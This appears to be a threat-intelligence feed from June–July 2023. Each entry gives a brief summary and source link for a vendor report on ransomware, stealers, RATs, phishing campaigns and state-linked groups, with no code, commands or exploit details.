Trend Micro researchers discovered a new signed rootkit, originating from China, that targets the gaming sector. The rootkit acts as a universal loader and communicates with command-and-control infrastructure. It passed through the Windows Hardware Quality Labs (WHQL) process and obtained a valid signature; the findings were reported to Microsoft's Security Response Center.
Source: https://www.trendmicro.com/en_us/research/23/g/hunting-for-a-new-stealthy-universal-rootkit-loader.html
2023-07-11
Distribution_of_malicious_batch_file
LOW
+
Intel Source:
ASEC
Intel Name:
Distribution_of_malicious_batch_file
Date of Scan:
2023-07-11
Impact:
LOW
Summary:
AhnLab Security Emergency Response Center (ASEC) has confirmed the distribution of malware in the form of a batch file (*.bat). The malware downloads different scripts depending on which anti-malware processes, including AhnLab products, are running in the user's environment. Based on the function names used by the malware and the parameters of the download URLs, it is suspected to have been distributed by the Kimsuky group.
Source: https://asec.ahnlab.com/en/55219/
2023-07-10
A_BlackByte_ransomware_deep_analyses
LOW
+
Intel Source:
Microsoft
Intel Name:
A_BlackByte_ransomware_deep_analyses
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
The Microsoft Incident Response team observed a threat actor go through the full attack chain, from initial access to impact, in less than five days, causing severe business disruption for the victim organization. Within those five days the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware.
Source: https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/
2023-07-10
Deep_details_of_Big_Head_Ransomware_s_Variants
LOW
+
Intel Source:
TrendMicro
Intel Name:
Deep_details_of_Big_Head_Ransomware_s_Variants
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
Trend Micro provides a deeper analysis of the Big Head ransomware variants, their tactics and impact, along with updated IOCs.
Source: https://www.trendmicro.com/en_us/research/23/g/tailing-big-head-ransomware-variants-tactics-and-impact.html
2023-07-10
Phishing_Attacks_by_APT28_Group
LOW
+
Intel Source:
CERT-UA
Intel Name:
Phishing_Attacks_by_APT28_Group
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
CERT-UA researchers have discovered HTML files that imitate the web interface of mail services and exfiltrate the authentication data entered by the victim via HTTP POST requests. The stolen data is relayed through previously compromised Ubiquiti devices (EdgeOS).
Source: https://cert.gov.ua/article/5105791
2023-07-10
The_malvertising_USPS_campaign
LOW
+
Intel Source:
Malwarebytes
Intel Name:
The_malvertising_USPS_campaign
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
Malwarebytes researchers observed a recent malvertising-driven phishing attack targeting both mobile and desktop users who were trying to track their packages via the United States Postal Service website; the fake site ultimately phishes for JPMorgan Chase credentials.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/07/malicious-ad-for-usps-phishes-for-jpmorgan-chase-credentials
2023-07-10
The_distribution_of_NetSupport_RAT
LOW
+
Intel Source:
ASEC, Ciberdefensa
Intel Name:
The_distribution_of_NetSupport_RAT
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
ASEC researchers discovered NetSupport RAT being distributed via a spear-phishing email that has recently been in circulation. Their analysis covers the whole process flow, from distribution via phishing email through to detection.
Source: https://ciberdefensa.cat/archivos/16021 https://asec.ahnlab.com/en/55146/
2023-07-10
Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
LOW
+
Intel Source:
Lab52
Intel Name:
Unknown_Actor_Targeting_Chinese_Users_With_APT29_TTP
Date of Scan:
2023-07-10
Impact:
LOW
Summary:
Lab52 researchers have identified several maldoc samples belonging to a potential malicious campaign. It appears to be aimed at Chinese-speaking users, as the content of the maldoc is written in Chinese. The infection chain resembles that of the threat actor APT29; however, significant differences from APT29's typical infection chain suggest that this is not that threat actor.
Source: https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/
2023-07-10
Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Ukrainian_Public_Entities_Are_Targeted_by_UAC_0057
Date of Scan:
2023-07-10
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified a new targeted cyber attack by the UAC-0057 group against Ukrainian public officials leveraging XLS files that contain a malicious macro spreading PicassoLoader malware. The malicious loader is capable of dropping another malicious strain dubbed njRAT to spread the infection further.
Source: https://cert.gov.ua/article/5098518
2023-07-09
Increasing_TrueBot_Malware_Attacks
MEDIUM
+
Intel Source:
CISA
Intel Name:
Increasing_TrueBot_Malware_Attacks
Date of Scan:
2023-07-09
Impact:
MEDIUM
Summary:
CISA researchers have warned about the emergence of new variants of the TrueBot malware. These variants specifically target organizations in the United States and Canada, aiming to extract sensitive data from compromised networks.
Source: https://www.cisa.gov/sites/default/files/2023-07/aa23-187a-increased-truebot-activity-infects-us-and-canada-based-networks_1.pdf
2023-07-08
Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
LOW
+
Intel Source:
Proofpoint
Intel Name:
Analysis_of_TA453s_Foray_into_LNKs_and_Mac_Malware
Date of Scan:
2023-07-08
Impact:
LOW
Summary:
Proofpoint researchers have observed that TA453 continues to adapt its malware arsenal, deploying novel file types and targeting new operating systems, specifically sending Mac malware to one of its recent targets.
Source: https://www.proofpoint.com/us/blog/threat-insight/welcome-new-york-exploring-ta453s-foray-lnks-and-mac-malware
2023-07-08
Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
LOW
+
Intel Source:
Cyble
Intel Name:
Ransomware_Lists_Victim_Host_Information_in_Ransom_Note
Date of Scan:
2023-07-08
Impact:
LOW
Summary:
Cyble researchers have identified a new ransomware strain named "Underground Team ransomware". Its ransom note introduces novel elements that distinguish it from typical ransom notes: in addition to guaranteeing a fair and confidential deal within a short timeframe, the group offers more than just a decryptor.
Source: https://blog.cyble.com/2023/07/05/underground-team-ransomware-demands-nearly-3-million/
2023-07-08
ARCrypter_ransomware_activity
LOW
+
Intel Source:
Cyble
Intel Name:
ARCrypter_ransomware_activity
Date of Scan:
2023-07-08
Impact:
LOW
Summary:
ARCrypter ransomware, also known as ChileLocker, drew attention in August 2022 with an attack in Chile, and researchers soon found it targeting organizations worldwide. It targets both Windows and Linux operating systems. This year, researchers reported a new Linux variant of ARCrypter written in Go, as well as an updated version of the Windows executable. Cyble also identified new techniques the threat actor (TA) uses to interact with victims: compared with the older variant, the ransom note of each binary now points to a mirror site, and the TA creates a dedicated Tor-hosted chat site for each victim.
Source: https://blog.cyble.com/2023/07/06/arcrypt-ransomware-evolves-with-multiple-tor-communication-channels/
2023-07-07
Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
LOW
+
Intel Source:
ReversingLabs
Intel Name:
Malicious_NPM_Packages_Fuel_Supply_Chain_and_Phishing_Attacks
Date of Scan:
2023-07-07
Impact:
LOW
Summary:
ReversingLabs researchers have discovered more than a dozen malicious packages published to the npm open-source repository that appear to target application end users while also supporting email phishing campaigns targeting Microsoft 365 users.
Source: https://www.reversinglabs.com/blog/operation-brainleeches-malicious-npm-packages-fuel-supply-chain-and-phishing-attacks
2023-07-07
Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Hackers_From_China_Targeting_Europe_in_SmugX_Campaign
Date of Scan:
2023-07-07
Impact:
MEDIUM
Summary:
Check Point researchers have identified a campaign in which a Chinese threat actor targets government entities in Europe, with a focus on foreign and domestic policy entities.
Source: https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
2023-07-07
The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
LOW
+
Intel Source:
Reliaquest
Intel Name:
The_Details_of_Infection_of_Gootloader_Led_to_Credential_Access
Date of Scan:
2023-07-07
Impact:
LOW
Summary:
The ReliaQuest researchers have responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.”
Source: https://www.reliaquest.com/blog/gootloader-infection-credential-access/
2023-07-07
Analysis_of_Silentbobs_Cloud_Attack
MEDIUM
+
Intel Source:
Aquasec
Intel Name:
Analysis_of_Silentbobs_Cloud_Attack
Date of Scan:
2023-07-07
Impact:
MEDIUM
Summary:
Aqua Nautilus researchers have identified the infrastructure of a potentially massive campaign against cloud-native environments. It is in the early stages of testing and deployment and consists mainly of an aggressive cloud worm designed to deploy on exposed JupyterLab and Docker APIs in order to drop Tsunami malware, hijack cloud credentials, hijack resources and spread the worm further.
Source: https://blog.aquasec.com/threat-alert-anatomy-of-silentbobs-cloud-attack
2023-07-07
Diving_Deep_into_Emotet_Malware_Family
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Diving_Deep_into_Emotet_Malware_Family
Date of Scan:
2023-07-07
Impact:
LOW
Summary:
Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. Since reappearing after its takedown it has launched multiple spam campaigns, and Mealybug has created several new modules and repeatedly updated and improved the existing ones.
Source: https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/
2023-07-06
White_Snake_stealer_threat
LOW
+
Intel Source:
Quickheal
Intel Name:
White_Snake_stealer_threat
Date of Scan:
2023-07-06
Impact:
LOW
Summary:
Quick Heal researchers describe the technical aspects of the updated White Snake stealer version 1.6, providing insight into its behaviour and its latest capabilities.
Source: https://blogs.quickheal.com/white-snake-menace-the-growing-threat-of-information-stealers-in-the-cybercrime-landscape/
2023-07-06
Attackers_Targeting_North_Atlantic_Treaty_Organization
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
Attackers_Targeting_North_Atlantic_Treaty_Organization
Date of Scan:
2023-07-06
Impact:
MEDIUM
Summary:
CERT-UA researchers have discovered a website that copies the English version of the legitimate web resource of the international non-governmental organization "World Congress of Ukrainians".
Source: https://cert.gov.ua/article/5077168
2023-07-06
Neo_Nets_eCrime_campaign_targeted_financial_institutions
LOW
+
Intel Source:
Sentinelone
Intel Name:
Neo_Nets_eCrime_campaign_targeted_financial_institutions
Date of Scan:
2023-07-06
Impact:
LOW
Summary:
SentinelLabs has been tracking Neo_Net, which conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised the personal information of thousands of victims. The operation also involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.
Source: https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/
2023-07-06
New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
LOW
+
Intel Source:
Elastic
Intel Name:
New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
Date of Scan:
2023-07-06
Impact:
LOW
Summary:
Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.
Source: https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
2023-07-06
NoName_057_16_DDoSia_Project_Gets_an_Upgrade
LOW
+
Intel Source:
Sekoia
Intel Name:
NoName_057_16_DDoSia_Project_Gets_an_Upgrade
Date of Scan:
2023-07-06
Impact:
LOW
Summary:
Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.
Source: https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/
2023-07-06
Multiple_New_Clipper_Malware_Variants
LOW
+
Intel Source:
Cyble
Intel Name:
Multiple_New_Clipper_Malware_Variants
Date of Scan:
2023-07-06
Impact:
LOW
Summary:
Cyble researchers have previously discovered several Clipper malware variants, including Laplas Clipper, IBAN Clipper and Keona Clipper. Recently they observed several more variants and a significant number of related samples being submitted to VirusTotal. Clipper malware hijacks cryptocurrency transactions by silently replacing the wallet address in the victim's clipboard with the Threat Actors' (TAs') wallet address, so that when the unsuspecting user pays from their cryptocurrency account the funds are diverted to the TAs instead of the intended recipient. This can lead to significant financial losses for the victim.
Source: https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/
2023-07-05
Malicious_QR_Codes_are_getting_to_employee_credentials
LOW
+
Intel Source:
Inky
Intel Name:
Malicious_QR_Codes_are_getting_to_employee_credentials
Date of Scan:
2023-07-05
Impact:
LOW
Summary:
INKY recently discovered a multitude of QR-code phishing emails and shared its findings.
Source: https://www.inky.com/en/blog/fresh-phish-malicious-qr-codes-are-quickly-retrieving-employee-credentials
2023-07-05
Decryption_tool_for_the_Akira_ransomware
LOW
+
Intel Source:
Avast
Intel Name:
Decryption_tool_for_the_Akira_ransomware
Date of Scan:
2023-07-05
Impact:
LOW
Summary:
Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.
Source: https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/
2023-07-05
Meduza_Stealer
LOW
+
Intel Source:
Uptycs
Intel Name:
Meduza_Stealer
Date of Scan:
2023-07-05
Impact:
LOW
Summary:
The Uptycs Threat Research team recently discovered a new threat named the Meduza Stealer. Created by an actor known as 'Meduza', this malware is designed to target Windows users and organizations, currently in only ten specific countries. Its purpose is data theft: it harvests the user's browsing activity and a wide array of browser-related data, from login credentials to browsing history and bookmarks, and also targets crypto wallet extensions, password managers and 2FA extensions.
Source: https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work
2023-07-05
Th_connection_investigation_of_2_clients_in_2_threat_hunts
LOW
+
Intel Source:
Sophos
Intel Name:
Th_connection_investigation_of_2_clients_in_2_threat_hunts
Date of Scan:
2023-07-05
Impact:
LOW
Summary:
Sophos researchers investigated two clients and two threat hunts for any connection between them, using Microsoft's cloud security API (Microsoft Graph) to parse piles of disparate data, with compelling results.
Source: https://news.sophos.com/en-us/2023/06/30/investigator-api-yourself-deploying-microsoft-graph-on-the-trail-of-an-attacker/
2023-07-05
Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
LOW
+
Intel Source:
ASEC
Intel Name:
Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
Date of Scan:
2023-07-05
Impact:
LOW
Summary:
ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.
Source: https://asec.ahnlab.com/en/54937/
2023-07-05
Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
HIGH
+
Intel Source:
Wordfence
Intel Name:
Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
Date of Scan:
2023-07-05
Impact:
HIGH
Summary:
Wordfence researchers have identified an unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. At the time of the report the vulnerability had not been adequately patched in the latest available version, 2.6.6.
Source: https://www.wordfence.com/blog/2023/06/psa-unpatched-critical-privilege-escalation-vulnerability-in-ultimate-member-plugin-being-actively-exploited/
2023-07-04
Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
LOW
+
Intel Source:
TrendMicro
Intel Name:
Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
Date of Scan:
2023-07-04
Impact:
LOW
Summary:
TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
Source: https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html
2023-07-04
New_C2_Framework_Leveraging_by_MuddyWater
LOW
+
Intel Source:
Deep Instinct
Intel Name:
New_C2_Framework_Leveraging_by_MuddyWater
Date of Scan:
2023-07-04
Impact:
LOW
Summary:
Deep Instinct researchers have attributed a previously unseen command-and-control (C2) framework called PhonyC2 to the Iranian state-sponsored group MuddyWater, which has used it since 2021.
Source: https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater
2023-07-04
Malware_being_executed_using_DNS_TXT_records
LOW
Intel Source:
ASEC
Intel Name:
Malware_being_executed_using_DNS_TXT_records
Date of Scan:
2023-07-04
Impact:
LOW
Summary:
The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.
Source: https://asec.ahnlab.com/en/54916/
2023-07-03
Updated_GuLoader_loader
LOW
Intel Source:
ISC.SANS
Intel Name:
Updated_GuLoader_loader
Date of Scan:
2023-07-03
Impact:
LOW
Summary:
This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.
Source: https://isc.sans.edu/diary/rss/29990
2023-07-03
HMRC_Self_Assessment_Phish_Outsmart_SEGs
LOW
Intel Source:
Cofense
Intel Name:
HMRC_Self_Assessment_Phish_Outsmart_SEGs
Date of Scan:
2023-07-03
Impact:
LOW
Summary:
During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. The Cofense Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and, regrettably, these phishing emails often evade the popular secure email gateways (SEGs) that are meant to protect users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile, a common tactic employed by threat actors to create a deceptive sense of urgency and legitimacy.
Source: https://cofense.com/blog/unmasking-hmrc-self-assessment-phish-how-attackers-outsmart-secure-email-gateways-segs/
2023-07-03
Malware_Disguised_as_HWP_Document_File_Kimsuky
LOW
Intel Source:
ASEC
Intel Name:
Malware_Disguised_as_HWP_Document_File_Kimsuky
Date of Scan:
2023-07-03
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.
Source: https://asec.ahnlab.com/en/54736/
2023-07-03
GuLoader_Campaign_Targets_Law_Firms_in_the_US
LOW
Intel Source:
Morphisec
Intel Name:
GuLoader_Campaign_Targets_Law_Firms_in_the_US
Date of Scan:
2023-07-03
Impact:
LOW
Summary:
Morphisec researchers discussed the GuLoader campaign, noting its targeting of specific industries and highlighting its use of legitimate hosting services for distributing malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec's AMTD technology can protect systems from these attacks.
Source: https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us
2023-07-02
Charming_Kitten_updates_backdoor_called_POWERSTAR
MEDIUM
Intel Source:
volexity
Intel Name:
Charming_Kitten_updates_backdoor_called_POWERSTAR
Date of Scan:
2023-07-02
Impact:
MEDIUM
Summary:
Volexity researchers frequently observe the threat actor Charming Kitten, which is assumed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and, subsequently, the email of individuals it successfully spear-phishes. The Volexity team analyzed the new version of the POWERSTAR backdoor, which led to the discovery that Charming Kitten has been spreading its malware alongside its spear-phishing techniques.
Source: https://www.volexity.com/blog/2023/06/28/charming-kitten-updates-powerstar-with-an-interplanetary-twist/
2023-07-02
Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
LOW
Intel Source:
PaloAlto
Intel Name:
Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
Date of Scan:
2023-07-02
Impact:
LOW
Summary:
Unit 42 researchers have discovered two Cobalt Strike Team Server instances hosted online. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. The operators of these Team Server instances hide their C2 infrastructure using popular services and public cloud infrastructure providers. Additionally, the researchers have provided guidance for Palo Alto Networks customers on how to receive protection and mitigation against Cobalt Strike Beacon and other related Cobalt Strike tools.
Source: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/
2023-07-02
ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
Date of Scan:
2023-07-02
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provides statistical information on each type.
Source: https://asec.ahnlab.com/en/54861/
2023-07-02
8Base_Ransomware
LOW
Intel Source:
vmware
Intel Name:
8Base_Ransomware
Date of Scan:
2023-07-02
Impact:
LOW
Summary:
The 8Base ransomware group has remained relatively unknown despite a massive spike in activity in the summer of 2023.
Source: https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html
2023-07-01
Manic_Menagerie_2_0_threat_actor
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Manic_Menagerie_2_0_threat_actor
Date of Scan:
2023-07-01
Impact:
MEDIUM
Summary:
Unit 42 researchers discovered an active campaign targeting several web hosting and IT providers in the United States and the European Union from late 2020 to late 2022. Unit 42 tracks the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the previous campaign known as Manic Menagerie.
Source: https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/
2023-07-01
The_exposion_of_active_adversary_JokerSpy
LOW
Intel Source:
SentinelOne
Intel Name:
The_exposion_of_active_adversary_JokerSpy
Date of Scan:
2023-07-01
Impact:
LOW
Summary:
Researchers at BitDefender and Elastic have discovered an active adversary using novel spyware, cross-platform backdoors and an open-source reconnaissance tool to compromise organizations with macOS devices in their fleet. Although few victims are known at this time, the analysis suggests that the threat actors have likely targeted other organizations. SentinelOne researchers shared the key components and indicators used in the campaign to help raise awareness and aid security teams and threat hunters.
Source: https://www.sentinelone.com/blog/jokerspy-unknown-adversary-targeting-organizations-with-multi-stage-macos-malware/
2023-06-30
New_Fast_Developing_ThirdEye_Infostealer
LOW
Intel Source:
Fortinet
Intel Name:
New_Fast_Developing_ThirdEye_Infostealer
Date of Scan:
2023-06-30
Impact:
LOW
Summary:
FortiGuard Labs recently discovered some suspicious-looking files. Their investigation confirmed that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer that was named “ThirdEye”. While this malware is not considered sophisticated, it aims to steal various information from compromised machines that can be used as a stepping stone for future attacks.
Source: https://www.fortinet.com/blog/threat-research/new-fast-developing-thirdeye-infostealer-pries-open-system-information
2023-06-30
Malicious_Actors_deploy_phishing_pages_to_mobile_devices
LOW
Intel Source:
Cofense
Intel Name:
Malicious_Actors_deploy_phishing_pages_to_mobile_devices
Date of Scan:
2023-06-30
Impact:
LOW
Summary:
The Cofense Phishing Defense Center analysts have discovered a spike in the number of malicious emails utilizing QR codes as an attack vector. In order to bypass traditional file and text detection software, QR codes provide threat actors with a different tactic to encode malicious URLs.
Source: https://cofense2022stg.wpengine.com/blog/malicious-actors-utilizing-qr-codes-to-deploy-phishing-pages-to-mobile-devices/
2023-06-29
ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
LOW
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
Date of Scan:
2023-06-29
Impact:
LOW
Summary:
The ASEC analysis team keeps monitoring weekly collections of malware samples; this report covers June 5-11th, 2023. They used their automatic analysis system RAPIT to categorize and respond to known malware. The top malware families for this week are Amadey, Lokibot, Guloader, AgentTesla and Formbook.
Source: https://asec.ahnlab.com/en/54260/
2023-06-28
PDF_Based_Attacks_Are_Becoming_More_Common
LOW
Intel Source:
Avanan
Intel Name:
PDF_Based_Attacks_Are_Becoming_More_Common
Date of Scan:
2023-06-28
Impact:
LOW
Summary:
Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate 'DocuSign' document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient's email address.
Source: https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them
2023-06-28
Linux_Users_at_Risk_From_Akira_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
Linux_Users_at_Risk_From_Akira_Ransomware
Date of Scan:
2023-06-28
Impact:
LOW
Summary:
Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.
Source: https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
2023-06-27
The_details_of_Wagner_Groups_Cyber_campaign
LOW
Intel Source:
Cyble
Intel Name:
The_details_of_Wagner_Groups_Cyber_campaign
Date of Scan:
2023-06-27
Impact:
LOW
Summary:
Cyble researchers investigated a new ransomware called Wagner. This ransomware is possibly a variant of Chaos ransomware. The researchers found that the ransom note urges users to join the PMC Wagner. It was discovered that the ransomware sample was initially submitted to VirusTotal from Russia. Because the ransom note is written in Russian, the researchers assume that the ransomware may primarily target victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.
Source: https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/
2023-06-27
The_Examination_of_Trickbot_and_Conti_Crypters
LOW
Intel Source:
IBM Security Intelligence
Intel Name:
The_Examination_of_Trickbot_and_Conti_Crypters
Date of Scan:
2023-06-27
Impact:
LOW
Summary:
IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.
Source: https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/
2023-06-27
SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
LOW
Intel Source:
Krebson Security
Intel Name:
SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
Date of Scan:
2023-06-27
Impact:
LOW
Summary:
The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.
Source: https://krebsonsecurity.com/2023/06/sms-phishers-harvested-phone-numbers-shipment-data-from-ups-tracking-tool/?replytocom=586273
2023-06-27
The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
MEDIUM
Intel Source:
Cybergeeks
Intel Name:
The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
Date of Scan:
2023-06-27
Impact:
MEDIUM
Summary:
SALTWATER is a backdoor used in the exploitation of the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon called bsmtpd. The malware hooks the recv, send, and close functions using an open-source hooking library called funchook. The following functionalities are implemented: execution of arbitrary commands, file download and upload, proxy functionality, and tunneling functionality.
Source: https://cybergeeks.tech/a-technical-analysis-of-the-saltwater-backdoor-used-in-barracuda-0-day-vulnerability-cve-2023-2868-exploitation/
2023-06-27
The_Black_Basta_ransomware_cover_of_roundup
MEDIUM
Intel Source:
Fortinet
Intel Name:
The_Black_Basta_ransomware_cover_of_roundup
Date of Scan:
2023-06-27
Impact:
MEDIUM
Summary:
FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining interest within their datasets and the OSINT community. Their Ransomware Roundup report shares brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta
2023-06-26
Email_Spam_using_Modiloader_Attachments
LOW
Intel Source:
ISC.SANS
Intel Name:
Email_Spam_using_Modiloader_Attachments
Date of Scan:
2023-06-26
Impact:
LOW
Summary:
Researchers from SANS have analyzed two quarantined emails that had different body text but the same attachment.
Source: https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/
2023-06-26
Word_Document_with_Online_Template_Attached
LOW
Intel Source:
ISC.SANS
Intel Name:
Word_Document_with_Online_Template_Attached
Date of Scan:
2023-06-26
Impact:
LOW
Summary:
Researchers from SANS have found a Word document behaving like a dropper. It uses a remote Word template and makes an HTTP request to an external website.
Source: https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/
2023-06-24
Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
MEDIUM
Intel Source:
Deep Instinct
Intel Name:
Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
Date of Scan:
2023-06-24
Impact:
MEDIUM
Summary:
Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.
Source: https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid
2023-06-24
Qakbot_Distributing_Tag_via_Obama_Series
LOW
Intel Source:
ISC.SANS
Intel Name:
Qakbot_Distributing_Tag_via_Obama_Series
Date of Scan:
2023-06-24
Impact:
LOW
Summary:
Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).
Source: https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/
2023-06-23
RedEnergy_Stealer_as_a_Ransomware_Attacks
LOW
Intel Source:
Zscaler
Intel Name:
RedEnergy_Stealer_as_a_Ransomware_Attacks
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.
Source: https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks
2023-06-23
The_Service_in_question_rents_email_addresses
LOW
Intel Source:
Krebson Security
Intel Name:
The_Service_in_question_rents_email_addresses
Date of Scan:
2023-06-23
Impact:
LOW
Summary:
